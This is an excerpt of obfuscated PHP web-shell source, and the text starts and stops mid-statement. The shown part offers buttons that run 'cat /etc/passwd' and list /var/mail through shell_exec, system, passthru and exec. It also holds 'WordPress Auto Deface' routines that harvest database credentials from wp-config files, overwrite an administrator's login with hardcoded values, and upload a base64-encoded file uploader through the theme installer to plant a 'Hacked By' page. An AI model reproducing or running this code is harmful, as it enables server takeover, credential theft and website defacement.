141\154\165\145\x3d\x22\x41\167\x6b\40\x50\x72\x6f\147\x72\141\155\42\40\156\x61\x6d\145\75\42\141\x77\153\x75\x73\x65\162\x22\76\x3c\x2f\146\x6f\x72\x6d\x3e\74\x2f\164\144\x3e\12\40\40\x20\x20\x3c\x74\x64\76\x3c\x66\157\x72\x6d\x20\155\145\x74\x68\157\x64\75\42\160\157\x73\164\x22\76\x3c\x69\x6e\x70\165\164\x20\x74\x79\x70\145\75\x22\x73\165\x62\155\151\164\x22\x20\166\x61\x6c\x75\x65\75\x22\x53\x79\x73\164\145\155\x20\x46\x75\156\143\x74\151\157\156\x22\40\156\141\155\145\x3d\42\163\x79\x73\x74\165\x73\145\162\x22\76\74\57\146\x6f\x72\155\x3e\74\x2f\164\x64\76\12\40\40\40\x20\74\x74\144\x3e\74\146\x6f\x72\155\x20\155\145\x74\x68\157\144\75\42\160\157\x73\x74\42\76\74\x69\x6e\x70\x75\x74\x20\x74\171\160\x65\75\42\163\165\142\x6d\x69\164\42\40\x76\x61\x6c\165\145\75\x22\120\141\163\163\x74\x68\162\x75\x20\106\165\x6e\x63\x74\x69\x6f\156\42\40\x6e\x61\155\x65\75\42\160\x61\x73\163\164\x68\x75\x73\x65\x72\x22\76\x3c\57\146\x6f\162\x6d\x3e\74\57\164\x64\x3e\11\12\x20\x20\x20\x20\x3c\x74\x64\76\74\x66\157\x72\155\x20\155\145\164\150\157\144\75\x22\160\x6f\x73\x74\x22\76\x3c\151\x6e\x70\x75\164\x20\x74\171\160\x65\75\x22\x73\165\x62\x6d\x69\164\42\40\166\141\154\x75\145\75\42\105\x78\145\143\40\x46\165\156\143\164\x69\157\156\42\40\x6e\x61\x6d\145\75\42\x65\170\x75\x73\x65\162\x22\76\x3c\57\x66\157\x72\155\76\74\x2f\x74\x64\76\11\x9\xa\40\40\x20\x20\x3c\164\x64\x3e\x3c\x66\157\x72\155\40\155\145\164\x68\x6f\x64\75\x22\160\157\x73\x74\x22\x3e\74\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\42\x73\x75\142\155\x69\x74\x22\x20\x76\141\x6c\x75\x65\x3d\42\123\x68\145\x6c\154\137\x65\x78\145\x63\40\106\165\156\143\x74\x69\157\x6e\42\x20\156\141\155\145\x3d\42\x73\150\145\x78\x75\163\x65\x72\x22\76\x3c\x2f\146\x6f\x72\x6d\x3e\x3c\57\164\144\76\12\74\57\164\x72\76\xa\x3c\x2f\x74\141\x62\154\145\76\x3c\142\162\x3e"; if ($_POST["\141\x77\x6b\165\163\x65\162"]) { echo "\x3c\164\x65\x78\164\x61\162\145\141\x20\x63\154\x61\x73\x73\75\x27\x69\x6e\x70\x75\x74\172\142\x75\164\x27\x20\x63\157\x6c\163\x3d\47\66\x35\47\40\162\x6f\x77\x73\75\47\x31\65\47\x3e"; echo shell_exec("\x61\167\x6b\x20\55\x46\x3a\x20\47\173\x20\x70\162\x69\x6e\164\40\44\61\40\x7d\47\40\x2f\x65\164\143\x2f\x70\x61\x73\x73\167\144\40\x7c\40\x73\157\162\164"); echo "\x3c\57\164\x65\x78\164\141\x72\145\141\x3e\74\142\x72\76"; } if ($_POST["\163\x79\163\164\x75\163\x65\x72"]) { echo "\x3c\x74\145\x78\x74\x61\162\145\141\x20\143\154\141\163\x73\75\47\151\x6e\x70\x75\x74\172\x62\x75\164\47\x20\143\157\x6c\163\75\47\66\x35\x27\40\162\x6f\x77\x73\x3d\x27\x31\65\x27\x3e"; echo system("\x6c\x73\x20\57\x76\141\162\57\155\141\151\154"); echo "\74\x2f\x74\x65\170\x74\x61\162\x65\141\x3e\x3c\x62\x72\x3e"; } if ($_POST["\x70\141\x73\163\164\150\x75\x73\x65\162"]) { echo "\74\x74\x65\170\164\141\x72\145\141\40\143\x6c\x61\163\163\x3d\x27\151\156\160\x75\x74\172\x62\165\164\47\40\143\157\154\x73\75\x27\x36\65\47\40\162\157\167\163\x3d\47\x31\65\x27\x3e"; echo passthru("\154\x73\40\57\166\x61\x72\x2f\155\141\x69\x6c"); echo "\74\x2f\x74\x65\x78\164\141\162\145\141\76\x3c\142\162\x3e"; } if ($_POST["\145\x78\x75\163\x65\162"]) { echo "\x3c\x74\x65\x78\x74\x61\x72\145\x61\40\x63\x6c\x61\163\x73\x3d\47\151\156\x70\x75\x74\172\x62\165\x74\x27\40\x63\157\x6c\x73\x3d\47\x36\65\x27\x20\162\157\167\x73\75\x27\61\x35\47\x3e"; echo exec("\x6c\x73\x20\57\x76\141\162\x2f\155\x61\151\154"); echo "\x3c\57\x74\x65\170\x74\x61\x72\145\141\76\74\142\162\76"; } if ($_POST["\163\x68\x65\170\x75\x73\x65\162"]) { echo "\74\164\145\x78\164\141\x72\x65\x61\x20\143\x6c\x61\x73\163\x3d\x27\151\x6e\160\x75\x74\x7a\x62\x75\x74\x27\x20\143\x6f\154\x73\75\47\66\x35\47\40\x72\157\167\x73\75\x27\61\x35\x27\x3e"; echo shell_exec("\154\x73\40\57\166\x61\162\x2f\155\x61\151\x6c"); echo "\x3c\x2f\164\145\170\x74\141\162\x65\x61\76\74\x62\162\x3e"; } if ($_POST["\163\x79\x73\164"]) { echo "\x3c\164\x65\x78\x74\141\x72\x65\141\x20\x63\x6c\141\163\x73\75\47\x69\156\x70\x75\x74\x7a\x27\40\143\x6f\154\163\75\47\x36\65\47\x20\x72\157\x77\x73\75\47\x31\65\x27\x3e"; echo system("\x63\x61\x74\x20\57\x65\164\x63\57\x70\141\x73\163\167\x64"); echo "\x3c\57\x74\x65\x78\164\141\x72\x65\x61\x3e\74\x62\x72\x3e\74\x62\162\76\74\142\76\74\57\x62\x3e\74\x62\x72\76"; } if ($_POST["\160\x61\x73\163\x74\x68"]) { echo "\74\164\x65\x78\x74\141\162\145\x61\40\143\x6c\141\x73\163\75\47\151\x6e\160\x75\x74\x7a\x27\x20\143\x6f\x6c\x73\x3d\47\66\x35\47\40\x72\157\x77\163\x3d\47\x31\65\x27\76"; echo passthru("\143\141\164\40\x2f\x65\164\143\x2f\160\x61\163\163\x77\x64"); echo "\x3c\57\164\x65\170\x74\x61\162\x65\x61\x3e\x3c\x62\x72\x3e\x3c\142\162\x3e\x3c\142\x3e\74\x2f\142\76\x3c\142\162\76"; } if ($_POST["\145\170"]) { echo "\x3c\164\x65\170\x74\x61\x72\x65\x61\40\143\154\141\x73\163\x3d\47\151\x6e\x70\x75\164\172\47\x20\143\157\154\163\x3d\47\x36\x35\47\40\x72\157\167\x73\75\x27\x31\x35\47\76"; echo exec("\143\x61\x74\x20\x2f\145\x74\143\x2f\x70\141\163\163\167\x64"); echo "\x3c\x2f\x74\x65\x78\164\x61\x72\145\x61\x3e\x3c\x62\162\76\x3c\142\x72\76\x3c\142\76\74\57\x62\x3e\x3c\142\x72\76"; } if ($_POST["\163\150\x65\x78"]) { echo "\74\x74\145\170\164\141\162\145\x61\x20\143\154\x61\x73\x73\75\x27\151\156\160\165\x74\172\x27\40\143\157\154\x73\75\47\x36\65\47\40\x72\x6f\167\x73\75\47\x31\x35\47\76"; echo shell_exec("\143\x61\x74\x20\x2f\145\x74\x63\x2f\x70\141\x73\163\167\144"); echo "\74\x2f\164\x65\170\164\x61\x72\x65\x61\76\x3c\142\x72\76\74\142\162\76\x3c\x62\76\x3c\x2f\142\x3e\x3c\142\x72\76"; } echo "\74\x63\145\x6e\164\x65\x72\76"; if ($_POST["\155\x65\154\x65\170"]) { echo "\74\x74\145\170\x74\141\162\x65\x61\40\x63\x6c\141\163\x73\75\47\151\x6e\160\165\x74\172\47\x20\x63\157\x6c\163\x3d\47\x36\65\47\x20\162\x6f\167\163\75\x27\61\x35\47\76"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\72"; } print "\12"; } } echo "\x3c\57\164\x65\x78\164\x61\162\x65\141\x3e\74\x62\162\76\x3c\x62\162\x3e"; } } elseif ($_GET["\x64\x6f"] == "\141\x75\164\x6f\137\x64\167\x70") { if ($_POST["\x61\165\164\x6f\x5f\144\145\x66\141\143\x65\137\x77\x70"]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\x6c\x6c\141\57\65\56\60\40\50\127\x69\x6e\144\x6f\x77\x73\40\116\124\40\x36\x2e\x31\73\40\162\166\x3a\63\x32\56\x30\51\x20\x47\x65\143\x6b\x6f\57\x32\60\x31\x30\x30\x31\60\x31\40\x46\x69\162\145\x66\157\x78\x2f\63\x32\56\x30"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "\143\x6f\157\153\x69\145\x2e\x74\170\x74"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\157\157\x6b\151\145\x2e\x74\170\164"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array("\x6c\157\147" => "{$userr}", "\160\x77\x64" => "{$pass}", "\162\145\x6d\145\155\x62\145\162\155\x65" => "\x66\x6f\x72\x65\x76\x65\x72", "\167\160\x2d\163\165\142\155\151\164" => "{$wp_submit}", "\162\x65\144\x69\162\x65\143\x74\x5f\x74\157" => "{$web}", "\164\145\x73\164\143\157\x6f\153\151\x65" => "\61"); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\151\x6c\x6c\141\x2f\65\56\x30\40\50\127\151\x6e\x64\157\167\x73\x20\116\x54\x20\x36\x2e\61\x3b\40\162\166\72\x33\62\56\60\x29\x20\x47\145\143\x6b\157\x2f\62\60\61\60\x30\61\x30\61\x20\x46\x69\162\145\x66\157\x78\57\63\62\56\x30"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR, "\143\157\x6f\153\151\145\x2e\164\x78\x74"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\157\x6f\153\151\x65\x2e\164\x78\x74"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST["\x6c\151\156\153\x5f\x63\x6f\156\x66\x69\x67"]; $link_config = scandir($scan); $script = htmlspecialchars($_POST["\163\143\x72\x69\160\x74"]); $user = "\x30\170\61\x39\71\71"; $pass = "\60\170\61\71\x39\x39"; $passx = md5($pass); foreach ($link_config as $dir_config) { if (!is_file("{$scan}\57{$dir_config}")) { continue; } $config = file_get_contents("{$scan}\57{$dir_config}"); if (preg_match("\57\127\157\162\x64\120\162\x65\x73\163\57", $config)) { $dbhost = ambilkata($config, "\104\102\137\x48\x4f\x53\x54\47\x2c\40\47", "\x27"); $dbuser = ambilkata($config, "\x44\102\x5f\125\123\105\x52\47\x2c\x20\x27", "\x27"); $dbpass = ambilkata($config, "\104\x42\x5f\120\x41\123\123\x57\117\122\x44\x27\54\x20\47", "\47"); $dbname = ambilkata($config, "\104\x42\137\116\x41\115\105\x27\54\x20\47", "\x27"); $dbprefix = ambilkata($config, "\164\141\142\x6c\x65\x5f\x70\162\145\146\x69\170\40\40\75\x20\x27", "\x27"); $prefix = $dbprefix . "\x75\x73\x65\162\x73"; $option = $dbprefix . "\x6f\160\164\x69\x6f\156\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\105\114\x45\x43\x54\40\52\40\106\122\117\115\40{$prefix}\x20\117\122\x44\x45\122\x20\102\131\40\151\x64\x20\x41\x53\x43"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\x53\105\114\105\103\124\x20\x2a\40\106\122\x4f\x4d\40{$option}\x20\117\x52\104\x45\x52\40\102\131\x20\x6f\160\164\151\x6f\x6e\137\151\144\x20\x41\x53\103"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { echo "\x5b\55\x5d\x20\x3c\x66\157\156\164\40\x63\157\154\x6f\162\75\x72\145\144\x3e\145\x72\162\157\162\x2c\40\147\x61\x62\151\163\141\40\141\155\x62\x69\154\x20\x6e\x61\155\x61\x20\x64\157\155\141\x69\x6e\x20\156\x79\141\x3c\57\146\x6f\156\164\76\74\142\x72\x3e"; } else { echo "\x5b\53\135\40{$target}\40\x3c\x62\x72\x3e"; } $update = mysql_query("\125\x50\104\101\124\x45\x20{$prefix}\40\x53\x45\124\x20\x75\163\145\162\137\154\157\147\x69\156\75\x27{$user}\47\x2c\x75\163\145\x72\x5f\x70\x61\163\x73\x3d\x27{$passx}\x27\40\x57\x48\x45\122\105\40\x49\x44\75\47{$id}\x27"); if (!$conn or !$db or !$update) { echo "\133\55\x5d\x20\115\171\123\121\x4c\40\105\x72\162\157\162\72\x20\x3c\x66\157\x6e\164\40\x63\157\x6c\x6f\162\x3d\162\145\144\x3e" . mysql_error() . "\x3c\x2f\x66\x6f\x6e\x74\x3e\x3c\142\162\x3e\x3c\x62\162\76"; mysql_close($conn); } else { $site = "{$target}\x2f\167\160\x2d\x6c\x6f\147\151\156\x2e\x70\x68\x70"; $site2 = "{$target}\57\x77\x70\55\x61\x64\x6d\x69\x6e\57\x74\x68\145\155\x65\55\151\x6e\x73\x74\141\154\x6c\56\x70\150\x70\77\x75\160\x6c\157\x61\144"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "\151\144\75\x22\x77\x70\x2d\x73\x75\142\x6d\151\x74\x22\x20\x63\x6c\x61\x73\x73\75\42\142\165\x74\164\157\156\40\x62\165\164\x74\x6f\156\55\160\162\x69\x6d\141\x72\x79\40\142\x75\x74\164\157\156\55\x6c\x61\x72\147\145\42\x20\166\141\154\x75\x65\75\42", "\42\40\57\x3e"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b, "\x6e\x61\x6d\145\75\x22\x5f\167\160\x6e\x6f\x6e\143\145\42\40\166\141\x6c\x75\x65\x3d\x22", "\x22\40\57\76"); $upload3 = base64_decode("\132\x32\x46\x75\144\x47\126\x75\x5a\x77\x30\113\120\x44\71\167\x61\x48\x41\x4e\103\x69\122\155\x61\127\170\154\x4d\171\x41\71\111\103\x52\146\122\x6b\154\x4d\x52\126\116\142\112\x32\132\160\142\107\125\x7a\112\61\60\67\x44\121\157\x67\111\103\122\x75\132\x58\144\x6d\141\x57\170\x6c\x4d\x7a\60\151\x61\171\65\x77\141\x48\101\x69\117\167\x30\x4b\x49\103\101\147\x49\x43\x41\x67\111\x43\x41\x67\111\103\x41\147\x49\x43\101\x67\x49\107\154\155\x49\103\x68\x6d\x61\127\x78\x6c\x58\62\126\x34\141\x58\x4e\x30\x63\171\x67\151\x4c\151\64\x76\114\x69\64\x76\x4c\x69\x34\x76\114\151\64\166\111\x69\64\153\x62\155\126\63\x5a\155\154\x73\x5a\124\115\x70\113\123\102\61\142\155\x78\160\142\155\163\157\x49\x69\64\165\114\171\64\x75\x4c\171\64\x75\114\171\x34\x75\x4c\x79\111\165\x4a\x47\x35\x6c\x64\x32\x5a\160\x62\x47\125\x7a\113\x54\x73\x4e\103\151\101\x67\x49\x43\x41\147\111\103\x41\147\142\127\71\62\132\x56\71\61\143\x47\170\x76\131\x57\122\154\x5a\x46\71\x6d\x61\127\170\154\113\103\122\155\x61\127\170\154\x4d\61\x73\x6e\144\x47\x31\x77\130\62\65\150\142\127\125\156\130\x53\167\x67\111\151\64\x75\x4c\171\x34\x75\x4c\x79\64\x75\114\x79\x34\x75\x4c\x79\x52\x75\132\130\x64\x6d\x61\x57\170\154\115\x79\111\160\117\167\60\113\x44\x51\x6f\57\x50\147\x3d\75"); $www = "\155\x2e\x70\x68\160"; $fp5 = fopen($www, "\167"); fputs($fp5, $upload3); $post2 = array("\x5f\x77\x70\156\x6f\x6e\x63\145" => "{$anu2}", "\x5f\x77\x70\x5f\x68\x74\x74\x70\x5f\162\x65\146\x65\162\x65\x72" => "\x2f\167\160\x2d\x61\144\155\151\156\x2f\x74\150\145\155\x65\x2d\151\x6e\x73\164\x61\x6c\x6c\56\x70\150\x70\x3f\165\160\154\x6f\x61\x64", "\164\x68\145\155\x65\172\151\160" => "\100{$www}", "\x69\x6e\163\x74\x61\x6c\x6c\x2d\164\150\145\x6d\x65\x2d\x73\x75\142\x6d\x69\164" => "\111\x6e\163\x74\x61\x6c\x6c\40\116\x6f\x77"); $ch = curl_init("{$target}\x2f\167\x70\x2d\141\x64\x6d\151\x6e\x2f\x75\x70\144\141\164\x65\x2e\160\150\160\x3f\141\143\x74\x69\x6f\x6e\x3d\x75\160\x6c\x6f\x61\144\55\x74\150\145\155\145"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR, "\x63\157\157\153\x69\145\56\x74\x78\164"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\143\x6f\x6f\x6b\151\145\56\x74\x78\164"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("\x59"); $m = date("\155"); $namafile = "\x69\144\x2e\x70\x68\160"; $fpi = fopen($namafile, "\x77"); fputs($fpi, $script); $ch6 = curl_init("{$target}\x2f\167\160\55\x63\x6f\156\x74\x65\x6e\x74\57\165\x70\154\157\x61\x64\x73\57{$y}\57{$m}\57{$www}"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array("\146\151\x6c\x65\63" => "\x40{$namafile}")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "\143\x6f\x6f\x6b\x69\145\56\164\170\164"); curl_setopt($ch6, CURLOPT_COOKIEJAR, "\x63\157\157\153\151\x65\x2e\x74\170\164"); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "{$target}\57\x6b\x2e\160\150\160"; $bs = anucurl($as); if (preg_match("\x23{$script}\x23\x69\x73", $bs)) { echo "\133\x2b\x5d\40\x3c\x66\157\x6e\164\x20\x63\157\154\x6f\x72\x3d\x27\154\151\x6d\x65\47\76\x62\x65\x72\x68\x61\x73\151\154\40\155\x65\x70\145\163\56\x2e\x2e\74\x2f\146\157\x6e\x74\76\74\x62\x72\76"; echo "\133\53\x5d\40\x3c\141\x20\x68\x72\x65\146\x3d\47{$as}\47\x20\x74\141\x72\147\x65\164\x3d\x27\137\142\154\x61\x6e\x6b\47\76{$as}\x3c\x2f\x61\76\x3c\142\162\x3e\74\142\x72\x3e"; } else { echo "\133\55\x5d\40\x3c\x66\157\156\164\40\x63\157\x6c\x6f\x72\x3d\x27\x72\x65\x64\x27\x3e\147\141\x67\x61\x6c\x20\155\x65\160\x65\163\x2e\x2e\56\x3c\57\146\x6f\x6e\x74\76\74\x62\x72\76"; echo "\x5b\x21\41\x5d\x20\143\x6f\x62\x61\x20\141\152\x61\x20\x6d\x61\156\165\141\x6c\72\x20\74\142\x72\x3e"; echo "\x5b\x2b\x5d\x20\74\141\40\x68\x72\x65\x66\x3d\47{$target}\x2f\x77\160\55\154\157\147\151\x6e\x2e\x70\x68\x70\x27\x20\164\141\162\x67\145\x74\75\47\x5f\x62\x6c\x61\156\153\47\76{$target}\57\x77\160\x2d\x6c\x6f\x67\x69\156\x2e\160\150\160\74\57\x61\x3e\x3c\142\x72\76"; echo "\133\x2b\135\40\165\163\145\x72\156\141\155\145\x3a\x20\74\x66\157\156\164\x20\143\157\154\x6f\162\x3d\x6c\x69\x6d\x65\x3e{$user}\x3c\x2f\146\x6f\x6e\164\76\74\x62\x72\76"; echo "\133\x2b\135\40\x70\141\163\163\167\157\162\x64\72\40\x3c\x66\x6f\x6e\x74\x20\x63\x6f\154\x6f\x72\75\154\x69\x6d\x65\x3e{$pass}\x3c\57\146\x6f\156\x74\76\x3c\142\162\x3e\x3c\x62\162\76"; } mysql_close($conn); } } } } else { echo "\x3c\143\x65\x6e\x74\x65\162\76\74\150\61\76\x57\157\162\x64\x50\162\145\x73\163\40\x41\x75\164\x6f\40\x44\145\x66\141\143\x65\74\x2f\x68\x31\76\xa\11\11\74\x66\157\162\x6d\40\x6d\145\x74\150\x6f\x64\x3d\x27\x70\x6f\163\x74\47\76\12\11\11\x3c\151\x6e\x70\165\164\40\164\171\x70\x65\75\x27\164\145\170\164\47\40\156\141\155\x65\75\47\154\x69\156\x6b\x5f\143\157\x6e\146\x69\147\47\x20\x73\x69\x7a\145\75\47\65\60\47\40\x68\145\x69\147\x68\164\75\47\x31\x30\47\x20\166\141\154\x75\x65\75\x27{$dir}\47\76\74\x62\162\x3e\12\x9\x9\74\x69\156\160\165\164\40\x74\x79\x70\x65\75\47\164\x65\170\164\x27\x20\156\141\x6d\145\75\47\163\143\x72\151\x70\164\x27\x20\x68\145\x69\147\x68\164\x3d\47\61\60\47\40\163\x69\x7a\x65\x3d\x27\65\60\47\x20\x70\154\141\x63\145\x68\x6f\x6c\x64\145\x72\x3d\47\110\x61\x63\153\145\144\40\x42\x79\x20\x6b\151\x6c\154\145\x72\x30\x30\67\47\x20\x72\x65\x71\165\x69\x72\x65\144\76\x3c\x62\x72\76\xa\11\x9\74\x69\156\x70\165\164\40\164\171\160\145\x3d\x27\163\x75\x62\155\x69\164\x27\x20\163\164\171\x6c\145\x3d\x27\167\x69\x64\164\x68\x3a\x20\x34\65\60\x70\x78\73\47\x20\x6e\141\x6d\x65\75\x27\x61\x75\164\157\x5f\x64\x65\146\x61\x63\x65\x5f\167\160\x27\40\x76\x61\154\165\x65\75\47\x48\141\x63\x6b\47\x3e\12\x9\x9\74\x2f\x66\x6f\x72\155\76\12\11\x9\x3c\142\162\x3e\xa\11\x9\x3c\x2f\x63\145\x6e\x74\145\x72\x3e"; } } elseif ($_GET["\144\157"] == "\141\165\x74\x6f\x5f\x64\x77\x70\62") { if ($_POST["\141\x75\164\x6f\x5f\x64\145\x66\141\143\145\137\167\160"]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\151\154\x6c\141\x2f\65\x2e\x30\40\50\x57\151\x6e\x64\x6f\x77\163\x20\x4e\124\40\66\56\61\73\40\x72\x76\x3a\63\x32\56\x30\51\40\107\x65\143\153\x6f\x2f\62\x30\61\x30\60\x31\x30\61\40\x46\x69\162\x65\x66\x6f\x78\x2f\63\x32\56\60"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "\x63\157\157\153\x69\145\x2e\164\170\164"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\157\x6f\x6b\151\145\56\164\170\164"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array("\154\x6f\147" => "{$userr}", "\x70\x77\144" => "{$pass}", "\162\145\x6d\x65\155\142\x65\x72\155\145" => "\x66\157\162\x65\166\145\x72", "\x77\160\55\163\165\x62\x6d\151\x74" => "{$wp_submit}", "\162\145\144\x69\x72\x65\x63\x74\137\x74\x6f" => "{$web}", "\164\145\163\x74\143\157\x6f\x6b\x69\x65" => "\61"); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\151\154\x6c\141\x2f\x35\56\60\x20\x28\x57\151\x6e\144\157\167\163\40\116\x54\x20\66\56\x31\x3b\40\162\x76\x3a\x33\62\56\x30\x29\40\x47\x65\x63\x6b\x6f\x2f\62\x30\61\x30\60\x31\x30\x31\40\106\x69\162\x65\x66\x6f\170\x2f\63\x32\x2e\60"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR, "\143\x6f\157\153\151\145\56\x74\170\164"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\157\157\153\151\145\56\x74\x78\x74"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\xd\12", $_POST["\x6c\x69\x6e\x6b"]); $script = htmlspecialchars($_POST["\x73\143\x72\151\160\164"]); $user = "\151\x6e\144\x6f\170\x70\154\157\151\x74"; $pass = "\151\156\144\157\x78\160\x6c\157\x69\164"; $passx = md5($pass); foreach ($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config, "\104\x42\137\110\x4f\x53\x54\47\54\x20\47", "\x27"); $dbuser = ambilkata($config, "\x44\102\137\125\123\105\x52\47\x2c\40\47", "\x27"); $dbpass = ambilkata($config, "\x44\102\137\120\x41\x53\x53\x57\x4f\x52\104\x27\x2c\x20\x27", "\47"); $dbname = ambilkata($config, "\104\102\x5f\116\101\x4d\x45\47\54\x20\47", "\x27"); $dbprefix = ambilkata($config, "\x74\141\142\x6c\x65\x5f\160\x72\x65\x66\151\170\x20\x20\x3d\40\x27", "\x27"); $prefix = $dbprefix . "\165\163\x65\162\163"; $option = $dbprefix . "\157\160\164\151\x6f\156\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\x45\x4c\105\103\124\x20\x2a\40\106\x52\x4f\x4d\x20{$prefix}\40\117\x52\x44\x45\122\x20\102\x59\x20\151\144\40\x41\x53\103"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\123\105\114\105\103\124\x20\52\x20\x46\122\117\x4d\x20{$option}\40\117\x52\x44\105\x52\40\102\131\x20\157\x70\164\x69\x6f\x6e\x5f\151\144\40\101\x53\x43"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { echo "\133\55\x5d\40\74\146\157\156\164\40\x63\157\154\x6f\162\x3d\x72\x65\144\x3e\x65\x72\x72\157\x72\x2c\x20\147\x61\142\151\163\x61\x20\x61\x6d\x62\x69\154\40\x6e\x61\x6d\141\x20\x64\157\x6d\x61\151\156\40\x6e\171\141\x3c\57\146\157\156\164\x3e\74\x62\162\76"; } else { echo "\x5b\53\135\x20{$target}\x20\x3c\142\162\x3e"; } $update = mysql_query("\x55\120\x44\x41\124\105\40{$prefix}\40\x53\105\x54\x20\x75\163\145\162\x5f\154\157\x67\x69\156\x3d\x27{$user}\47\x2c\x75\163\x65\162\137\x70\x61\163\163\75\47{$passx}\x27\x20\x57\x48\x45\122\105\x20\x49\104\x3d\x27{$id}\x27"); if (!$conn or !$db or !$update) { echo "\x5b\x2d\x5d\40\115\x79\x53\x51\x4c\40\105\x72\x72\x6f\162\x3a\40\x3c\x66\157\156\x74\x20\x63\x6f\x6c\x6f\x72\x3d\x72\145\144\x3e" . mysql_error() . "\x3c\x2f\146\157\156\x74\x3e\74\x62\x72\x3e\x3c\x62\x72\x3e"; mysql_close($conn); } else { $site = "{$target}\57\x77\160\55\154\x6f\147\151\156\x2e\x70\x68\x70"; $site2 = "{$target}\x2f\167\160\x2d\141\144\x6d\x69\x6e\57\x74\x68\145\x6d\x65\x2d\x69\156\x73\164\141\154\154\56\x70\x68\160\x3f\x75\x70\154\157\x61\144"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "\151\144\75\42\x77\160\55\163\165\x62\x6d\x69\x74\x22\40\x63\154\x61\x73\x73\75\42\x62\165\x74\x74\x6f\x6e\40\x62\165\x74\164\157\x6e\x2d\x70\162\151\x6d\x61\162\x79\40\x62\165\x74\164\157\x6e\55\x6c\x61\x72\147\x65\x22\40\x76\141\154\165\x65\75\x22", "\x22\x20\x2f\76"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b, "\156\x61\155\145\75\x22\137\167\x70\156\157\x6e\x63\145\42\x20\x76\141\x6c\165\145\75\x22", "\42\40\x2f\76"); $upload3 = 